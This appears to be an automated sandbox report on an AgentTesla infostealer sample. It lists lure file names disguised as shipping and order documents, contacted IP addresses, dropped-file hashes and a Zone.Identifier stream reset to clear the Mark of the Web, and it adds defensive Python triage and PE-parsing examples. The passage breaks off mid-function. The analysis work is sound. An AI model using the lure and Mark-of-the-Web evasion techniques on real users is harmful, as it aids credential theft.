3b5074b1b5d032e5620f69f9f700ff0e | FeDex_shipping_document.exe | malicious | AgentTesla | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | DHL_Shipping_Document2.exe | malicious | AgentTesla, zgRAT | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exe | malicious | Vector Stealer | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | PO2023#PREORDER.PDF.exe | malicious | AgentTesla | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | PO_340166.exe | malicious | AgentTesla | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | PO_IN34023.exe | malicious | AgentTesla, zgRAT | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | 2303-64687.exe | malicious | AgentTesla | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | Product_specifications.exe | malicious | AgentTesla | 149.154.167.220, 173.231.16.76
3b5074b1b5d032e5620f69f9f700ff0e | REQUEST_FOR_QUOTE_1603023.exe | malicious | AgentTesla, zgRAT | 149.154.167.220, 173.231.16.76
No context

Process: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1459
Entropy (8bit): 5.3420905847574325
Encrypted: false
SSDEEP: 24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
MD5: FB4B7720101F874710FF986326F7980F
SHA1: 48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
SHA-256: 94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
SHA-512: B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

Process: C:\Users\user\Desktop\izwFjkhFJm.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 1459
Entropy (8bit): 5.3420905847574325
Encrypted: false
SSDEEP: 24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
MD5: FB4B7720101F874710FF986326F7980F
SHA1: 48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
SHA-256: 94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
SHA-512: B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 5829
Entropy (8bit): 4.8968676994158
Encrypted: false
SSDEEP: 96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
MD5: 36DE9155D6C265A1DE62A448F3B5B66E
SHA1: 02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
SHA-256: 8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
SHA-512: C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
Malicious: false
                                                                                Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 15672
Entropy (8bit): 5.542414046296337
Encrypted: false
SSDEEP: 384:nte/AM1oA1uPqtIosSjn+ilr3bsFvMs48LP:OrAqtyo+ilrIRpP
MD5: 8AEBA6925AFDFB54DA529AC11C28736E
SHA1: 05C4C8EE5B22C660A33DCFFC4F0E35900AF7BC90
SHA-256: 14595BFD9842BA212582C416C1B2F4128E1AC203DB766B0F5359EB46BF1F6265
SHA-512: 3C1A1D0E2273E4E9DA27384EEE2CED1B22EEC63B102D4602903705C8D9EDA6BCF07053A2FCFE0007629EE641F4B93F2D9D06F276E06995C96529DECD51E02E5F
Malicious: false
                                                                                Preview:@...e...........7.......$.....s.s...............................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1
                                                                                Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1863168
                                                                                Entropy (8bit):5.309741607982687
                                                                                Encrypted:false
                                                                                SSDEEP:24576:MVlSKtu1Dze6HDpL1J4yMPdxjNbTCUeoTYoTVCo8HkZ3Y8j8W0kWiqMhX2HyQBEO:8NLZzslSQqY5TXKZhSlB
                                                                                MD5:AE2A3B41292C66A9DD6F10C874C05293
                                                                                SHA1:CAA30701C5487C2AECFB9B35B1D0E9EA6F3214B6
                                                                                SHA-256:65CC1EA27C733C270DD0497ED9C99896BAF50EEAFA5E1200889557985BFD87D5
                                                                                SHA-512:54606FCE1CE37CA0B4A25DD94ABC5CD47BE86A498204A0581DEF8A62F714EA101B817570A456FF7E054A4C8D3DE8F3D69A8CD823DFA87515C4690AE229BB6315
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: Virustotal, Detection: 53%
                                                                                • Antivirus: ReversingLabs, Detection: 33%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..d.................H...$.......f... ........@.. ....................................`..................................f..W........!........................................................................... ............... ..H............text....F... ...H.................. ..`.rsrc....!......."...J..............@..@.reloc...............l..............@..B.................f......H.......DJ..T.......U...h1...............................................0...........(.....-.+.(!...+.*..0..........s.....-.&+......+.*..0..-.......(....,...s%....-.&+.(....+.*...-.&&+.(....+.*....0..0.......(....,....s?....-.&+.(....+.*....-.&&&+.(....+.*.0..#.......(....,..s3....-.&+.(....+.*.(....&*..0..*.......(....,..sV....-.&+.(....+.*..-.&+.(....+.*...0..,.......(....,..sJ....-.&+.(....+.*...-.&&+.(....+.*.0..-.......(....,...s6....-.&+.(....+.*...-.&&+.(....+.*....0..
                                                                                Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):26
                                                                                Entropy (8bit):3.95006375643621
                                                                                Encrypted:false
                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                Malicious:true
                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1863168
                                                                                Entropy (8bit):5.309741607982687
                                                                                Encrypted:false
                                                                                SSDEEP:24576:MVlSKtu1Dze6HDpL1J4yMPdxjNbTCUeoTYoTVCo8HkZ3Y8j8W0kWiqMhX2HyQBEO:8NLZzslSQqY5TXKZhSlB
                                                                                MD5:AE2A3B41292C66A9DD6F10C874C05293
                                                                                SHA1:CAA30701C5487C2AECFB9B35B1D0E9EA6F3214B6
                                                                                SHA-256:65CC1EA27C733C270DD0497ED9C99896BAF50EEAFA5E1200889557985BFD87D5
                                                                                SHA-512:54606FCE1CE37CA0B4A25DD94ABC5CD47BE86A498204A0581DEF8A62F714EA101B817570A456FF7E054A4C8D3DE8F3D69A8CD823DFA87515C4690AE229BB6315
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 33%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..d.................H...$.......f... ........@.. ....................................`..................................f..W........!........................................................................... ............... ..H............text....F... ...H.................. ..`.rsrc....!......."...J..............@..@.reloc...............l..............@..B.................f......H.......DJ..T.......U...h1...............................................0...........(.....-.+.(!...+.*..0..........s.....-.&+......+.*..0..-.......(....,...s%....-.&+.(....+.*...-.&&+.(....+.*....0..0.......(....,....s?....-.&+.(....+.*....-.&&&+.(....+.*.0..#.......(....,..s3....-.&+.(....+.*.(....&*..0..*.......(....,..sV....-.&+.(....+.*..-.&+.(....+.*...0..,.......(....,..sJ....-.&+.(....+.*...-.&&+.(....+.*.0..-.......(....,...s6....-.&+.(....+.*...-.&&+.(....+.*....0..
                                                                                Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):26
                                                                                Entropy (8bit):3.95006375643621
                                                                                Encrypted:false
                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                Malicious:true
                                                                                Preview:[ZoneTransfer]....ZoneId=0
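Two of the dropped PE files above carry the same MD5, SHA-1 and SHA-256 as the submitted sample, so they are copies the binary made of itself, and each is paired with a 26-byte Zone.Identifier stream reading [ZoneTransfer] / ZoneId=0. A ZoneId of 3 is the Mark of the Web that marks a file as downloaded from the Internet; writing 0 (Local Machine) into that stream removes the mark, so SmartScreen and Office protected view no longer treat the copy as untrusted. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses a constructed excerpt of the Key:Value records above and flags self-copies and cleared Zone.Identifier streams. The record excerpt, the SAMPLE_SHA256 constant and the raw stream bytes are taken or reconstructed from this page; the function names are the example's own.

```python
"""Triage of sandbox 'dropped file' records: flag copies of the submitted
sample and Zone.Identifier streams whose Mark of the Web has been cleared.

Added example; not part of the Joe Sandbox report or its tooling.
RECORDS is a constructed excerpt of the records listed on this page."""
import re

# SHA-256 of the submitted sample, as listed in the report.
SAMPLE_SHA256 = "65cc1ea27c733c270dd0497ed9c99896baf50eeafa5e1200889557985bfd87d5"

# Zone.Identifier ZoneId values (URLZONE enumeration); 3 is the Mark of the Web.
ZONES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
         3: "Internet", 4: "Restricted Sites"}

# Constructed excerpt: three of the dropped-file records above, as a raw
# string so the Windows paths need no escaping.
RECORDS = r"""
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Malicious:false
Preview:1
Process:C:\Users\user\Desktop\izwFjkhFJm.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1863168
SHA-256:65CC1EA27C733C270DD0497ED9C99896BAF50EEAFA5E1200889557985BFD87D5
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@.......
Process:C:\Users\user\Desktop\izwFjkhFJm.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):26
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0
"""

# The 26-byte stream behind that preview, reconstructed from its size and
# "CRLF line terminators" (the report preview shows non-printables as dots).
ZONE_STREAM = b"[ZoneTransfer]\r\nZoneId=0\r\n"


def parse_records(text):
    """Split the flattened report text into one dict per 'Process:' record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Process:"):
            current = {"Process": line.partition(":")[2].strip()}
            records.append(current)
            continue
        if current is None:
            continue
        if line.startswith("•"):  # bullet under the "Antivirus:" header
            current.setdefault("Antivirus", []).append(line.lstrip("• ").strip())
            continue
        key, _, value = line.partition(":")  # first colon only: values hold paths
        key = key.strip()
        current[key] = [] if key == "Antivirus" else value.strip()
    return records


def parse_zone_identifier(content):
    """Return the ZoneId from Zone.Identifier content (raw bytes or a text preview)."""
    if isinstance(content, bytes):
        content = content.decode("ascii", "replace")
    if "[ZoneTransfer]" not in content:
        return None
    m = re.search(r"ZoneId=(\d)", content)
    return int(m.group(1)) if m else None


def triage(records, sample_sha256):
    """Return (record index, finding, detail) tuples worth an analyst's attention."""
    findings = []
    for i, rec in enumerate(records):
        if rec.get("SHA-256", "").lower() == sample_sha256.lower():
            findings.append((i, "self_copy",
                             f"identical to the sample, written by {rec['Process']}"))
        zone = parse_zone_identifier(rec.get("Preview", ""))
        if zone is not None and zone < 3:  # anything below Internet clears the mark
            findings.append((i, "motw_cleared",
                             f"ZoneId={zone} ({ZONES[zone]}) in a {rec.get('Category')} "
                             f"Zone.Identifier stream written by {rec['Process']}"))
    return findings


if __name__ == "__main__":
    for idx, kind, detail in triage(parse_records(RECORDS), SAMPLE_SHA256):
        print(f"record {idx}: {kind}: {detail}")
```

On a live Windows host the same parse_zone_identifier() can be fed the alternate data stream read with open(path + ":Zone.Identifier", "rb"). The pattern to look for is a ZoneId below 3 in a stream whose writer is the executable itself rather than a browser or mail client: a download keeps ZoneId=3 unless something rewrote it.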
                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):5.309741607982687
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                File name:izwFjkhFJm.exe
                                                                                File size:1863168
                                                                                MD5:ae2a3b41292c66a9dd6f10c874c05293
                                                                                SHA1:caa30701c5487c2aecfb9b35b1d0e9ea6f3214b6
                                                                                SHA256:65cc1ea27c733c270dd0497ed9c99896baf50eeafa5e1200889557985bfd87d5
                                                                                SHA512:54606fce1ce37ca0b4a25dd94abc5cd47be86a498204a0581def8a62f714ea101b817570a456ff7e054a4c8d3de8f3d69a8cd823dfa87515c4690ae229bb6315
                                                                                SSDEEP:24576:MVlSKtu1Dze6HDpL1J4yMPdxjNbTCUeoTYoTVCo8HkZ3Y8j8W0kWiqMhX2HyQBEO:8NLZzslSQqY5TXKZhSlB
                                                                                TLSH:0D854CF24193FEC4976F2D4481143A40DC101C6797BC9698FDC92AA793E9978EF9CAB0
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..d.................H...$.......f... ........@.. ....................................`................................
                                                                                Icon Hash:78b87c6c6c606880
                                                                                Entrypoint:0x5c66f2
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6417E07C [Mon Mar 20 04:26:36 2023 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
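The fields above (time stamp, image characteristics, DLL characteristics, entry point) come straight from the COFF and optional headers, and the first instruction at the entry point of a managed executable is normally a jmp through an import-address-table slot to the CLR's _CorExeMain. The Python below is an added example, not code from the Joe Sandbox report: it decodes those fields from a raw PE32 image using only the standard library. Because the sample itself is not reproduced here, build_sample_image() constructs a minimal header carrying the same time stamp and flag values as listed above; its entry RVA (0x2080), section layout and image size are invented for the example.

```python
"""Decode the static PE header fields shown above (time stamp, image and
DLL characteristics, entry point, entry stub) from a raw PE32 image.

Added example, not code from the Joe Sandbox report. build_sample_image()
constructs a minimal header with the report's time stamp and flag values;
the section layout and entry RVA are made up for the example."""
import struct
from datetime import datetime, timezone

FILE_CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def flag_names(value, table):
    """Names of the bits set in value, in ascending bit order."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def rva_to_offset(rva, sections):
    """Map an RVA to a file offset via the section table."""
    for va, vsize, rawsize, rawptr in sections:
        if va <= rva < va + max(vsize, rawsize):
            return rva - va + rawptr
    raise ValueError(f"RVA {rva:#x} not in any section")


def parse_pe(data):
    """Return the header fields a static report lists, plus the entry stub."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (_machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) optional headers handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i
        _name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, hdr)
        sections.append((va, vsize, rawsize, rawptr))
    stub = data[rva_to_offset(entry_rva, sections):][:6]
    if stub[:2] == b"\xff\x25":  # FF 25 disp32: jmp dword ptr [disp32]
        entry_stub = "jmp dword ptr [0x%08x]" % struct.unpack_from("<I", stub, 2)[0]
    else:
        entry_stub = stub.hex()
    return {
        "timestamp": timestamp,
        "timestamp_utc": datetime.fromtimestamp(timestamp, timezone.utc)
                                 .strftime("%Y-%m-%d %H:%M:%S UTC"),
        "characteristics": flag_names(characteristics, FILE_CHARACTERISTICS),
        "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
        "entry_rva": entry_rva,
        "entry_va": image_base + entry_rva,
        "entry_stub": entry_stub,
    }


def build_sample_image():
    """Constructed minimal PE32 image: report's time stamp and flags, one
    .text section at RVA 0x2000 (file offset 0x200), entry at RVA 0x2080."""
    img = bytearray(0x400)
    img[:2] = b"MZ"
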